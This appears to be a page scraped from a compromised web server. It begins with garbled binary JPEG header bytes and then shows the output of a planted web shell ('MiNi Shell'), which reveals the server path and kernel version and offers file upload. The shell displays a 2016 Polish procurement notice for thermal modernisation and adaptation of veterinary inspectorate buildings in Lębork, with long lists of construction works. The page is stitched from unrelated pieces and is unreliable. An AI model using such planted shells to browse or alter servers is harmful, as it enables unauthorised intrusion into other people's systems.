JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160926/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160926/313421-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 313421 - 2016
              z dnia 2016-09-26 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Lębork: Termomodernizacja murowanych budynków pomocniczych Powiatowego Inspektoratu Weterynarii w Lęborku oraz adaptacja ich części do funkcji magazynu środków chemicznych oraz pomieszczenia do obserwacji stacjonarnej zwierząt<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Powiatowy Inspektorat Weterynarii w Lęborku, krajowy numer identyfikacyjny
              77098309300000, ul.
              ul. Weterynaryjna 
              1,
              84300  
              Lębork, woj.
              pomorskie, państwo
              , tel.
              59 862 21 80, e-mail
              gbendzmer@gdansk.wiw.gov.pl, faks
              59 862 21 01.
              <br />
              Adres strony internetowej (URL): www.piwebork.bip2.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja rządowa terenowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.piwlebok.bip2.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.piwlebork.bip2.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Wymagane jest, aby ofera była sporządzna w formie pisemnej, w języku polskim oraz dostarczona do: Powiatowego Inspektoratu Weterynarii w Lęborku<br />
                Adres:
                <br />Powiatowy Inspektorat Weterynarii w Lęborku, ul. Weterynaryjna 1, 84-300 Lębork, Sekretariat na parterze</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Termomodernizacja murowanych budynków pomocniczych Powiatowego Inspektoratu Weterynarii w Lęborku oraz adaptacja ich części do funkcji magazynu środków chemicznych oraz pomieszczenia do obserwacji stacjonarnej zwierząt<br /><b>Numer referencyjny: </b>PIW 08.225.01.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Termomodernizacja murowanych budynków pomocniczych Powiatowego Inspektoratu Weterynarii w Lęborku oraz adaptacja ich części do funkcji magazynu środków chemicznych oraz pomieszczenia do obserwacji stacjonarnej zwierząt, a w szczególności:

I. Budynek nr 1 roboty zewnętrzne:
- rozebranie pokrycia dachu z papy z wywozem i utylizacją - 117,92 m2
- rozebranie obróbek blacharskich - 19,44 m2
- rozebranie rynien - 17,60 m
- rozebranie rur spustowych - 6,80 m
- odkopanie ściany fundamentowej z ponownym zasypaniem - 4,61 m3
- przemurowanie kominów ponad dachem - 0,31 m3
- wymurowanie przewodów wentylacyjnych z pustaków keramzytobetonowych - 6,00 m
- wykonanie czapek betonowych - 1,25 m2
- otynkowanie cokołu tynkiem cienkowarstwowym silikonowym typu "baranek" o uziarnieniu 2 mm, barwionym w masie - 12,00 m2
- ocieplenie ścian budynków płytami styropianowymi EPS 70-040 gr. 12 cm metodą lekką-mokrą wraz z przygotowaniem i gruntowaniem podłoża i ręczne wyk. wyprawy elewacyjnej cienkowarstwowej - tynk silikonowy gr. 2 mm typu "baranek" barwiony w masie - 129,01 m2
- ocieplenie kominów płytami styropianowymi EPS 70-040 gr. 5 cm metodą lekką-mokrą wraz z przygotowaniem i gruntowaniem podłoża i ręczne wyk. wyprawy elewacyjnej cienkowarstwowej - tynk silikonowy gr. 2 mm typu "baranek" barwiony w masie - 4,36 m2
- ocieplenie ościeży płytami styropianowymi EPS 70-040 gr. 2 cm metodą lekką-mokrą wraz z przyg. podłoża i ręczne wyk. wyprawy elewacyjnej cienkowarstwowej - tynk silikonowy gr. 2 mm typu "baranek" barwiony w masie - 16,02 m2
- ochrona narożników wypukłych ościeży kątownikiem metalowym z siatką - 53,41 m2
- montaż aluminiowych listew startowych - 39,24 m
- izolacje ścian fundamentowych z trzech warstw emulsji asfaltowej - 6,98 m3
- przyklejenie płyt styropianowych EPS 100-038 gr. 10 cm do ścian fundamentowych z warstwą kleju na siatce - 12,22 m2
- izolacje ścian fundamentowych na dociepleniu z trzech warstw emulsji asfaltowej - 6,98 m3
- ułożenie izolacji z folii kubełkowej z listwą zamykającą - 6,98 m2
- docieplenie dachu płytami styropianowymi EPS 100-038 gr. 10 cm mocowanymi na klej i kołki - 63,65 m2
- pokrycie dachów papą na podłożu z płyt warstwowych ze styropianu, trzy warstwy papy asfaltowej termozgrzewalnej, pierwsza samoprzylepna - 117,92 m2
- obróbki blacharskie z blachy stalowej powlekanej - 24,24 m2
- rynny śr. 150 mm z blachy stalowej powlekanej - 17,60 m
- montaż rur spustowych (z demontażu) z uwzględnieniem grubości docieplenia - 6,80 m
- osadzenie krat ze stali nierdzewnej w oknach - 3,36 m2 (7 szt)
- wykonanie opaski z kostki betonowej gr. 6 cm na podsypce cementowo-piaskowej z zamknięciem obrzeżem betonowym 30x8 cm - 9,23 m2

II . Budynek nr 1 roboty wewnętrzne:
1. Pomieszczenie nr 1
- skucie tynków ścian - 38,56 m2
- rozebranie podłoża z betonu - 1,12 m3
- pogłębienie w ziemi o 12 cm pod nowe warstwy posadzki - 1,12 m3
- wywiezieni i utylizacja gruzu i ziemi z utylizacją - 2,24 m3
- podkład betonowy pod posadzki - 0,93 m3
- izolacja z dwóch warstw folii PCV 0,3 mm na podkładzie - 9,33 m2
- izolacja posadzki z płyt styropianowych EPS 100-038 gr. 8 cm - 9,33 m2
- izolacja z folii PCV 0,3 mm na styropianie - 9,33 m2
- warstwy wyrównawcze od posadzki gr. 5 cm - 9,33 cm
- posadzka z płytek gresowych 30x30 układane w "karo" - 9,33 m2
- tynki cem-wap. kat II ścian (pod glazurę) - 38,56 m2
- sufit podwieszany na ruszcie metalowym z kształtowników CD i Ud - płyty sufitowe zmywalne - 9,33 m2
- okładziny ścian płytkami glazurowanymi o wym. min. 25x35 cm na całą wysokość pomieszczenia - 19,28 m2
- osadzenie kratki wentylacyjnej - 1 szt
- przepierzenie między boksami dla zwierząt - płyta HPL gr. 12 mm mocowana od poziomu posadzki w okuciach ze stali nierdzewnej - 5,20 m2
- boksy dla zwierząt z prętów ze stali nierdzewnej śr. 14 mm, otwierane, (rozstaw prętów co 10 cm) z zamkiem - 3 kpl
- rurociągi z tworzyw sztucznych PE-X/Al/PE,PE-Xa - 16x2.0 w otulinie z pianki - 3,00 m
- rurociągi z tworzyw sztucznych PE-X/Al/PE,PE-Xa - 20x2.0 w otulinie z pianki - 2,00 m 
- osadzenie kratki ściekowej podłogowej - pokrywa ze stali nierdzewnej - średnica odpływu 75 mm - 1 szt
- montaż umywalek pojedynczych ze stali nierdzewnej o wym. min 40x30 cm z baterią stojącą - 1 kpl
- zawór z końcówką do węża śr. 15 mm - 1 szt
- demontaż starego okablowania i osprzętu elektrycznego - 1 kpl
- przewód YDYp 3x1,5 mm2 - 18,00 m
- przewód YDYp 3x2,5 mm2 - 16,00 m
- montaż łączników IP44 wraz z puszką - 1 szt
- montaż gniazd podwójnych podtynkowych IP44 - 1 szt
- montaż z podłączeniem: oprawa oświetleniowa natynkowa z elektronicznym układem zasilającym EVG 2x36 W, malowana proszkowo - IP44 - 1 szt
- montaż z podłączeniem:  oprawa oświetleniowa natynkowa, ledowa 5W, IP44 - 1 szt
- ogrzewanie podłogowe elektryczne na podłogę o pow. 9,0 m2 - mata grzejna 170W/m2 z regulatorem programowalnym i podłogowym czujnikiem temperatury - 1 kpl
- sprawdzenie i pomiar kompletnego 1-fazowego obwodu elektrycznego niskiego napięcia - 2 kpl

2. Pomieszczenie nr 2
- wykucie z muru okna z PCV o wym. 0,80x0,60 - 1 szt
- skucie tynków ścian - 30,58 m2 m2
- rozebranie podłoża z betonu - 0,70 m3
- pogłębienie w ziemi o 12 cm pod nowe warstwy posadzki - 0,70 m3
- wywiezieni i utylizacja gruzu i ziemi z utylizacją - 1,40 m3
- zamurowanie otworu po oknie bloczkami z gazobetonu - 0,12 m3
- podkład betonowy pod posadzki - 0,58 m3
- izolacja z dwóch warstw folii PCV 0,3 mm na podkładzie - 5,82 m2
- izolacja posadzki z płyt styropianowych EPS 100-038 gr. 8 cm - 5,82 m2
- izolacja z folii PCV 0,3 mm na styropianie - 5,82 m2
- warstwy wyrównawcze od posadzki gr. 5 cm - 5,82 cm
- posadzka z płytek gresowych 30x30 układane w "karo" - 5,82 m2
- tynki cem-wap. kat II ścian (pod glazurę) - 30,58 m2
- sufit podwieszany na ruszcie metalowym z kształtowników CD i Ud - płyty sufitowe zmywalne - 5,82 m2
- okładziny ścian płytkami glazurowanymi o wym. min. 25x35 cm na całą wysokość pomieszczenia - 30,58 m2
- osadzenie kratki wentylacyjnej - 1 szt
- osadzenie drzwi wewnętrznych wraz z ościeżnicą w profilach PCV szer 90 cm - 1 szt
- rurociągi z tworzyw sztucznych PE-X/Al/PE,PE-Xa - 16x2.0 w otulinie z pianki - 8,00 m
- rurociągi z tworzyw sztucznych PE-X/Al/PE,PE-Xa - 20x2.0 w otulinie z pianki - 6,00 m 
- osadzenie kratki ściekowej podłogowej - pokrywa ze stali nierdzewnej - średnica odpływu 75 mm - 1 szt
- montaż zlewozmywaka ze stali nierdzewnej z baterią stojącą z dźwignią uruchamianą łokciem - 1 kpl
- zawór z końcówką do węża śr. 15 mm - 1 szt
- demontaż starego okablowania i osprzętu elektrycznego - 1 kpl
- przewód YDYp 3x1,5 mm2 - 12,00 m
- przewód YDYp 3x2,5 mm2 - 6,00 m
- montaż łączników IP44 wraz z puszką - 1 szt
- montaż gniazd podwójnych podtynkowych IP44 - 1 szt
- montaż z podłączeniem: oprawa oświetleniowa natynkowa z elektronicznym układem zasilającym EVG 2x36 W, malowana proszkowo - IP44 - 1 szt
- ogrzewanie podłogowe elektryczne na podłogę o pow. 10,0 m2 - mata grzejna 170W/m2 z regulatorem programowalnym i podłogowym czujnikiem temperatury (wspólne do pomieszczenia 2 i 2A) - 1 kpl
- sprawdzenie i pomiar kompletnego 1-fazowego obwodu elektrycznego niskiego napięcia - 2 kpl

3. Pomieszczenie nr 2A
- skucie tynków ścian - 13,97 m2
- rozebranie podłoża z betonu - 0,59 m3
- pogłębienie w ziemi o 12 cm pod nowe warstwy posadzki - 0,59 m3
- wywiezieni i utylizacja gruzu i ziemi z utylizacją - 1,18 m3
- ścianki działowe z gazobetonu gr. 12 cm - 14,16 m2
- podkład betonowy pod posadzki - 0,49 m3
- izolacja z dwóch warstw folii PCV 0,3 mm na podkładzie - 4,94 m2
- izolacja posadzki z płyt styropianowych EPS 100-038 gr. 8 cm - 4,94 m2
- izolacja z folii PCV 0,3 mm na styropianie - 4,94 m2
- warstwy wyrównawcze od posadzki gr. 5 cm - 4,94 cm
- posadzka z płytek gresowych 30x30 układane w "karo" - 4,94 m2
- tynki cem-wap. kat II ścian (pod glazurę) - 27,95 m2
- sufit podwieszany na ruszcie metalowym z kształtowników CD i Ud - płyty g-k - 4,94 m2
- okładziny ścian płytkami glazurowanymi o wym. min. 25x35 cm na całą wysokość pomieszczenia - 23,85 m2
- osadzenie lustra - 0,48 m2
- osadzenie kratki wentylacyjnej - 1 szt
- osadzenie drzwi wewnętrznych wraz z ościeżnicą w profilach PCV szer 90 cm - 1 szt
- malowanie sufitu farbą emulsyjną - 4,94 m2
- rurociągi z tworzyw sztucznych PE-X/Al/PE,PE-Xa - 16x2.0 w otulinie z pianki - 6,00 m
- montaż umywalki porcelanowej z półpostumentem i baterią stojącą - 1 kpl
- demontaż starego okablowania i osprzętu elektrycznego - 1 kpl
- przewód YDYp 3x1,5 mm2 - 6,00 m
- przewód YDYp 3x2,5 mm2 - 6,00 m
- montaż łączników IP44 wraz z puszką - 1 szt
- montaż gniazd podwójnych podtynkowych IP44 - 1 szt
- montaż z podłączeniem: oprawa oświetleniowa natynkowa z elektronicznym układem zasilającym EVG 2x36 W, malowana proszkowo - IP44 - 1 szt
- przepływowy, elektryczny podgrzewacz wody naścienny, podumywalkowy o mocy min. 5kW - 1 szt
- sprawdzenie i pomiar kompletnego 1-fazowego obwodu elektrycznego niskiego napięcia - 2 kpl

4. Pomieszczenie nr 3
- rozebranie podłoża z betonu - 0,92 m3
- pogłębienie w ziemi o 12 cm pod nowe warstwy posadzki - 0,92 m3
- wywiezieni i utylizacja gruzu i ziemi z utylizacją - 1,85 m3
- ścianki działowe z gazobetonu gr. 12 cm - 7,84 m2
- uzupełnienie ścian gazobetonem - 0,84 m3
- osadzenie prefabrykowanych podokienników z płyty MDF 90x30 cm - 1 szt 
- podkład betonowy pod posadzki - 0,77 m3
- izolacja z dwóch warstw folii PCV 0,3 mm na podkładzie - 7,71 m2
- izolacja posadzki z płyt styropianowych EPS 100-038 gr. 8 cm - 7,71 m2
- izolacja z folii PCV 0,3 mm na styropianie - 7,71 m2
- warstwy wyrównawcze od posadzki gr. 5 cm - 7,71 cm
- posadzka z płytek gresowych 30x30 układane w "karo" z cokolikiem wys. 10 cm - 8,83 m2
- tynki cem-wap. kat III ścian - 16,89 m2
- przecieranie tynków ścian - 16,89 m2
- przecieranie tynków sufitów - 7,71 m2
- osadzenie kratki wentylacyjnej - 1 szt
- osadzenie drzwi wewnętrznych wraz z ościeżnicą w profilach PCV szer 90 cm - 1 szt
- malowanie sufitu farbą emulsyjną - 7,71 m2
- malowanie farbami emulsyjnymi ścian - 42,79 m2
- demontaż starego okablowania i osprzętu elektrycznego - 1 kpl
- przewód YDYp 3x1,5 mm2 - 11,50 m
- przewód YDYp 3x2,5 mm2 - 10,00 m
- montaż łączników IP44 wraz z puszką - 1 szt
- montaż gniazd podwójnych podtynkowych IP44 - 1 szt
- montaż z podłączeniem: oprawa oświetleniowa natynkowa z elektronicznym układem zasilającym EVG 2x36 W, malowana proszkowo - IP44 - 1 szt
- sprawdzenie i pomiar kompletnego 1-fazowego obwodu elektrycznego niskiego napięcia - 2 kpl

5. Pomieszczenie nr 4
- przebicie otworów w ścianach - 2 szt
- wykucie bruzd w ścianach (z zatynkowaniem) 1,00 m
- rurociągi z tworzyw sztucznych PE-X/Al/PE,PE-Xa - 20x2.0 w otulinie z pianki - 12,00 m
- zawór przelotowy 20 mm - 1 szt
- zawór kulowy z końcówką do węża śr. 15 mm - 1 szt
- wodomierz skrzydełkowy 15 mm - 1 szt
- osadzenie kratki ściekowej podłogowej ze stali nierdzewnej - 1 szt
- demontaż starego okablowania i osprzętu elektrycznego - 1 kpl
- przewód YDYp 3x1,5 mm2 - 22,00 m
- przewód YDYp 3x2,5 mm2 - 16,00 m
- montaż łączników IP44 wraz z puszką - 1 szt
- montaż gniazd podwójnych podtynkowych IP44 - 2 szt
- montaż z podłączeniem: oprawa oświetleniowa natynkowa z elektronicznym układem zasilającym EVG 2x36 W, malowana proszkowo - IP44 - 2 szt
- sprawdzenie i pomiar kompletnego 1-fazowego obwodu elektrycznego niskiego napięcia - 2 kpl

6. Pomieszczenie nr 5
- przebicie otworów w ścianach - 2 szt
- demontaż starego okablowania i osprzętu elektrycznego - 1 kpl
- przewód YDYp 3x1,5 mm2 - 32,00 m
- przewód YDYp 3x2,5 mm2 - 28,00 m
- przewód YDYp 5x2,5 mm2 - 18,00 m
- montaż łączników IP44 wraz z puszką - 1 szt
- montaż gniazd podwójnych podtynkowych IP44 - 2 szt
- montaż gniazda siłowego 16A - 1 szt
- montaż z podłączeniem: oprawa oświetleniowa natynkowa z elektronicznym układem zasilającym EVG 2x36 W, malowana proszkowo - IP44 - 2 szt
- sprawdzenie i pomiar kompletnego 1-fazowego obwodu elektrycznego niskiego napięcia - 2 kpl

7. Pomieszczenie nr 6
- przebicie otworów w ścianach - 2 szt
- demontaż starego okablowania i osprzętu elektrycznego - 1 kpl
- przewód YDYp 3x1,5 mm2 układany w rurkach PCV - 33,00 m
- przewód YDYp 3x2,5 mm2 układany w rurkach PCV - 28,00 m
- montaż łączników IP44 wraz z puszką - 1 szt
- montaż gniazd podwójnych podtynkowych IP44 - 2 szt
- montaż z podłączeniem: oprawa oświetleniowa natynkowa z elektronicznym układem zasilającym EVG 2x36 W, malowana proszkowo - IP44 - 1 szt
- sprawdzenie i pomiar kompletnego 1-fazowego obwodu elektrycznego niskiego napięcia - 2 kpl

8. Pomieszczenie nr 7
- uzupełnienie ścian bloczkami gazobetonowymi - 0,12 m3
- przebicie otworów w ścianach - 2 szt
- demontaż starego okablowania i osprzętu elektrycznego - 1 kpl
- przewód YDYp 3x1,5 mm2 układany w rurkach PCV - 36,00 m
- przewód YDYp 3x2,5 mm2 układany w rurkach PCV - 32,00 m
- montaż łączników IP44 wraz z puszką - 1 szt
- montaż gniazd podwójnych podtynkowych IP44 - 2 szt
- montaż z podłączeniem: oprawa oświetleniowa natynkowa z elektronicznym układem zasilającym EVG 2x36 W, malowana proszkowo - IP44 - 1 szt
- sprawdzenie i pomiar kompletnego 1-fazowego obwodu elektrycznego niskiego napięcia - 2 kpl

9. Roboty kanalizacyjne
- wykopy liniowe pod rurociąg zewnętrzny - 3,00 m3
- obsypka rurociągu kruszywem - 0,60 m3
- wykop jamisty pod zbiornik - 7,0 m3
- zasypanie wykopów z zagęszczeniem mechanicznym - 4,40 m3
- przebicie otworów w ścianach - 1 szt
- rurociąg z rur PCV 160 mm - 8,40 m
- rurociąg z rur PCV 50 mm - 8,00 m
- rurociąg z rur PCV 75 mm - 6,00 m
- rurociąg z rur PCV 110 mm - 8,00 m
- dostawa i osadzenie zbiornika bezodpływowego z tworzyw sztucznych o pojemności 5 m3 - 1 kpl

III. Budynek nr 2 roboty zewnętrzne:
- rozebranie pokrycia dachu z papy z wywozem i utylizacją - 164,20 m2
- rozebranie obróbek blacharskich - 26,68 m2
- rozebranie rynien - 9,90 m
- rur spustowych - 9,90 m
- wykucie okna - 1 szt
- wykucie z muru bramy garażowej - 4,98 m2
- odkopanie ściany fundamentowej z ponownym zasypaniem - 7,79 m3
- otynkowanie cokołu tynkiem cieńkowarstwowym silikonowym typu "baranek" o uziarnieniu 2 mm, barwionym w masie - 17,79 m2
- ocieplenie ścian budynków płytami styropianowymi EPS 70-040 gr. 12 cm metodą lekką-mokrą wraz z przygotowaniem i gruntowaniem podłoża i ręczne wyk. wyprawy elewacyjnej cienkowarstwowej - tynk silikonowy gr. 2 mm typu "baranek" barwiony w masie - 150,44 m2
- ocieplenie ościeży płytami styropianowymi EPS 70-040 gr. 2 cm metodą lekką-mokrą wraz z przyg. podłoża i ręczne wyk. wyprawy elewacyjnej cienkowarstwowej - tynk silikonowy gr. 2 mm typu "baranek" barwiony w masie - 17,90 m2
- ochrona narożników wypukłych ościeży kątownikiem metalowym z siatką - 59,68 m2
- montaż aluminiowych listew startowych - 47,80 m
- izolacje ścian fundamentowych z trzech warstw emulsji asfaltowej - 13,41 m3
- przyklejenie płyt styropianowych EPS 100-038 gr. 10 cm do ścian fundamentowych z warstwą kleju na siatce - 13,41 m2
- izolacje ścian fundamentowych na dociepleniu z trzech warstw emulsji asfaltowej - 13,41 m3
- ułożenie izolacji z folii kubełkowej z listwą zamykającą - 7,66 m2
- docieplenie dachu płytami styropianowymi EPS 100-038 gr. 10 cm mocowanymi na klej i kołki - 164,20 m2
- pokrycie dachów papą na podłożu z płyt warstwowych ze styropianu, trzy warstwy papy asfaltowej termozgrzewalnej, pierwsza samoprzylepna - 164,20 m2
- obróbki blacharskie z blachy stalowej powlekanej - 30,10 m2
